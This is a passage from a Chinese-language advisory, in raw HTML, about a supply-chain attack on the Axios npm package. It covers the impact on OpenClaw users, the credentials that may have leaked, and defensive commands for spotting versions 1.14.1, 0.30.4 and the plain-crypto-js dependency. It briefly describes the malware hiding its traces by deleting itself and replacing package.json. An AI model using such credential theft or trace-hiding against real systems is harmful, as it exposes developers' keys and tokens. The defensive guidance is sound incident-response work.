&#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">第四步：自我清理</span></span></h3><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><span leaf="">执行完成后，恶意脚本删除自身并将 package.json 替换为干净存根，试图隐藏攻击痕迹。</span></p><hr style="margin: 20px 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-width: 2px 0px 0px;border-style: solid none none;border-color: rgb(238, 242, 245) currentcolor currentcolor;border-image: none;border-radius: 2px;line-height: 1.75;"/><h2 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 1px 12.5px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(255, 255, 255);border-radius: 4px;display: inline-block;background-color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">对 OpenClaw 用户的影响</span></span></h2><blockquote style="margin: 0px;padding: 0.5em 1em;outline: 0px;border-left: 3px solid rgb(72, 112, 172);color: rgb(64, 70, 79);font-size: 14.4px;text-indent: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;display: block;background: rgb(246, 248, 250);line-height: 1.75;"><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;font-size: 14.4px;line-height: 1.75;"><strong mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 14.4px;line-height: 1.75;"><span leaf="">关键风险：</span></strong><span leaf="">OpenClaw 主程序及多个官方/社区插件在 package.json 中声明了对 Axios 的依赖。如果用户在 3 月 31 日后执行了</span><code mp-original-font-size="12.96" mp-original-line-height="1.7499999999999998" class="js_darkmode__11" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 12.96px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">npm install</span></code><span leaf="">或</span><code mp-original-font-size="12.96" mp-original-line-height="1.7499999999999998" class="js_darkmode__12" style="margin: 2px;padding: 2px 4px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;color: rgb(72, 112, 172);font-size: 12.96px;font-weight: normal;border-radius: 3px;background-color: rgb(246, 248, 250);word-break: break-all;line-height: 1.75;"><span leaf="">pnpm install</span></code><span leaf="">，可能已安装恶意版本。</span></p></blockquote><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">潜在风险场景</span></span></h3><ul style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: disc;line-height: 1.75;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">新安装 OpenClaw 的用户（使用</span><code mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">npm install -g openclaw@latest</span></code><span leaf="">）</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">更新 OpenClaw 或插件的用户</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">在 CI/CD 环境中自动构建的部署</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">开发环境中执行过依赖安装的开发人员</span></p></li></ul><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">可能泄露的敏感信息</span></span></h3><ul style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: disc;line-height: 1.75;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">SSH 密钥和云服务商凭证</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">飞书/钉钉/Discord 等聊天平台的 API Token</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">数据库连接字符串和 API 密钥</span></p></li><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><span leaf="">本地开发环境中的其他敏感配置文件</span></p></li></ul><hr style="margin: 20px 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-width: 2px 0px 0px;border-style: solid none none;border-color: rgb(238, 242, 245) currentcolor currentcolor;border-image: none;border-radius: 2px;line-height: 1.75;"/><h2 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 1px 12.5px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(255, 255, 255);border-radius: 4px;display: inline-block;background-color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">修复建议</span></span></h2><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">第一步：检查是否受影响</span></span></h3><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">检查 axios 版本：</span></strong></p><pre mp-original-font-size="12" mp-original-line-height="2" class="js_darkmode__14" style="margin: 1em 0.5em;padding: 0.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-radius: 5px;line-height: 2;box-shadow: rgba(0, 0, 0, 0.55) 0px 1px 5px;font-size: 12px;background: rgb(253, 246, 227);"><p mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;background-repeat: no-repeat;width: 653.029907px;height: 16px;font-size: 12px;line-height: 2;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="45" height="12" viewBox="0 0 450 130" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;" role="img" aria-label="插图"><ellipse cx="65" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="385" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse></svg></p><code class="js_darkmode__15" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0.5em;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;display: block;overflow-x: auto;color: rgb(88, 110, 117);background: rgb(253, 246, 227);font-size: 12px;line-height: 2;"><span leaf="">npm list axios 2&gt;/dev/null | grep -E </span><span class="js_darkmode__16" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(133, 153, 0);font-size: 12px;line-height: 2;"><span leaf="">&#34;1\.14\.1|0\.30\.4&#34;</span></span></code></pre><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">检查 package-lock.json：</span></strong></p><pre mp-original-font-size="12" mp-original-line-height="2" class="js_darkmode__17" style="margin: 1em 0.5em;padding: 0.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-radius: 5px;line-height: 2;box-shadow: rgba(0, 0, 0, 0.55) 0px 1px 5px;font-size: 12px;background: rgb(253, 246, 227);"><p mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;background-repeat: no-repeat;width: 653.029907px;height: 16px;font-size: 12px;line-height: 2;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="45" height="12" viewBox="0 0 450 130" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;" role="img" aria-label="插图"><ellipse cx="65" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="385" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse></svg></p><code class="js_darkmode__18" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0.5em;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;display: block;overflow-x: auto;color: rgb(88, 110, 117);background: rgb(253, 246, 227);font-size: 12px;line-height: 2;"><span leaf="">grep -A1 </span><span class="js_darkmode__19" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(133, 153, 0);font-size: 12px;line-height: 2;"><span leaf="">&#39;&#34;axios&#34;&#39;</span></span><span leaf=""> package-lock.json | grep -E </span><span class="js_darkmode__20" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(133, 153, 0);font-size: 12px;line-height: 2;"><span leaf="">&#34;1\.14\.1|0\.30\.4&#34;</span></span></code></pre><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 16px;line-height: 1.75;"><span leaf="">检查恶意依赖包：</span></strong></p><pre mp-original-font-size="12" mp-original-line-height="2" class="js_darkmode__21" style="margin: 1em 0.5em;padding: 0.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-radius: 5px;line-height: 2;box-shadow: rgba(0, 0, 0, 0.55) 0px 1px 5px;font-size: 12px;background: rgb(253, 246, 227);"><p mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;background-repeat: no-repeat;width: 653.029907px;height: 16px;font-size: 12px;line-height: 2;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="45" height="12" viewBox="0 0 450 130" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;" role="img" aria-label="插图"><ellipse cx="65" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse><ellipse cx="385" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)" mp-original-font-size="12" mp-original-line-height="2" style="font-size: 12px;line-height: 2;"></ellipse></svg></p><code class="js_darkmode__22" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0.5em;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Menlo, Monaco, Consolas, &#34;Liberation Mono&#34;, &#34;Roboto Mono&#34;, &#34;Courier New&#34;, &#34;Microsoft YaHei&#34;, monospace;display: block;overflow-x: auto;color: rgb(88, 110, 117);background: rgb(253, 246, 227);font-size: 12px;line-height: 2;"><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(42, 161, 152);font-size: 12px;line-height: 2;"><span leaf="">ls</span></span><span leaf=""> node_modules/plain-crypto-js 2&gt;/dev/null &amp;&amp; </span><span mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(42, 161, 152);font-size: 12px;line-height: 2;"><span leaf="">echo</span></span><span class="js_darkmode__23" mp-original-font-size="12" mp-original-line-height="2" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(133, 153, 0);font-size: 12px;line-height: 2;"><span leaf="">&#34;POTENTIALLY AFFECTED&#34;</span></span></code></pre><h3 mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 1.2em 0px 1em;padding: 0px;outline: 0px;font-weight: 400;font-size: 20.799999px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;color: rgb(72, 112, 172);line-height: 1.75;"><span mp-original-font-size="20.799999" mp-original-line-height="1.7499999879807686" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 20.799999px;line-height: 1.75;"><span leaf="">第二步：立即修复</span></span></h3><ol style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;caret-color: rgba(0, 0, 0, 0.9);color: rgba(0, 0, 0, 0.9);font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;list-style-type: decimal;line-height: 1.75;" class="list-paddingleft-1"><li style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><p mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 16px;line-height: 1.75;"><strong mp-original-font-size="16" mp-original-line-height="1.75" style="margin: 